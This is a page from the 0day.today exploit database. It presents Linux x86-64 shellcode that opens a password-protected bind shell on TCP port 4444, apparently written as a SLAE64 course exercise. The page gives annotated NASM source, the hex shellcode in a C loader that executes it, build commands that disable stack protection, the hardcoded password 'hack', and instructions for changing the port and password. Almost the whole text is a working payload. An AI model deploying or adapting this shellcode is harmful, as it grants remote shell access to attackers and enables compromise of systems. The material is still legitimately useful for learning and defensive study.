0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86-64 - Bindshell 4444/TCP with Password Prompt Shellcode (162 bytes)
[/*---------------------------------------------------------------------------------------------------------------------
/*
*Title: tcp bindshell with password prompt in 162 bytes
*Author: Sathish kumar
*Contact: https://www.linkedin.com/in/sathish94
*Description: x64 Linux bind TCP port shellcode on port 4444 with reconfigurable password
*Tested On: Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
* ./bindshell
* nc localhost 4444
*
*/
/*
* NOTE: This C code binds on port 4444
* The top of this file contains the .nasm source code
* The Port can be Reconfigured According to your needs
* Instructions for changing port number
* Port obtainer change the port value accorddingly
* port.py
* import socket
* port = 4444
* hex(socket.htons(port))
* python port.py
* Result : 0x5c11
* Replace the obtained value in the shellcode to change the port number
* For building the from .nasm source use
* nasm -felf64 filename.nasm -o filename.o
* ld filename.o -o filename
* To inspect for nulls
* objdump -M intel -D filename.o
global _start
_start:
jmp sock
prompt: db 'Passcode' ; initilization of prompt data
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
sock:
xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
xor rsi, rsi
mul rsi
push byte 0x2 ;pusing argument to the stack
pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
push byte 0x29 ; pushing the syscall number into the rax by using stack
pop rax
syscall
; copying the socket descripter from rax to rdi register so that we can use it further
xchg rax, rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
; setting up the data sctructure
push 0x2 ;AF_INET value is 2 so we are pushing 0x2
mov word [rsp + 2],0x5c11 ;port 4444 htons hex value is 0x5c11 port values can be be obtained by following above instructions
push rsp ; saving the complete argument to rsi register
pop rsi
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
push rdx ; Inserting the null to the stack
push byte 0x10
pop rdx ; value of the rdx register is set to 16 size sockaddr
push byte 0x31
pop rax ; rax register is set with 49 syscall for bind
syscall
;listen the sockets for the incomming connections
; listen(sock, MAX_CLIENTS)
; syscall number 50
pop rsi
push 0x32
pop rax ; rax register is set to 50 syscall for listen
syscall
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
;syscall number 43
push 0x2b
pop rax ; rax register is set to 43 syscall for accept
syscall
; storing the client socket description
mov r9, rax
; close parent
push 0x3
pop rax ; closing the parent socket connection using close parent rax is set to 3 syscall to close parent
syscall
xchg rdi , r9
xor rsi , rsi
; initilization of dup2
push 0x3
pop rsi ; setting argument to 3
duplicate:
dec esi
mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
syscall
jne duplicate
; Prompt for password
xor rax, rax
inc al ; rax register to value 1 syscall for write
push rax
pop rdi ; rdi register to value 1
lea rsi, [rel prompt]
xor rdx, rdx ; xor the rdx register to clear the previous values
push 0xe
pop rdx
syscall
; checking the password using read
password_check:
push rsp
pop rsi
xor rax, rax ; system read syscall value is 0 so rax is set to 0
syscall
push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
pop rax
lea rdi, [rel rsi]
scasd ; comparing the user input and stored password in the stack
jne Exit
execve: ; Execve format , execve("/bin/sh", 0 , 0)
xor rsi , rsi
mul rsi ; zeroed rax , rdx register
push ax ; terminate string with null
mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order
push rbx
push rsp
pop rdi ; set RDI
push byte 0x3b ; execve syscall number (59)
pop rax
syscall
Exit:
;Exit shellcode if password is wrong
push 0x3c
pop rax ;syscall number for exit is 60
xor rdi, rdi
syscall
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"
//Port number this can be obtained from the above instrcutions
"\x11\x5c"
"\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\x9d\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05"
//Password this can be obtained by
/*
* python
* password = 'hack'
* (password[::-1]).encode('hex')
* Reuslt : 6b636168
* This is stored in reverse beacuse of stack
*
*
*/
"\x68\x68\x61\x63\x6b"
"\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
# 0day.today [2024-12-26] #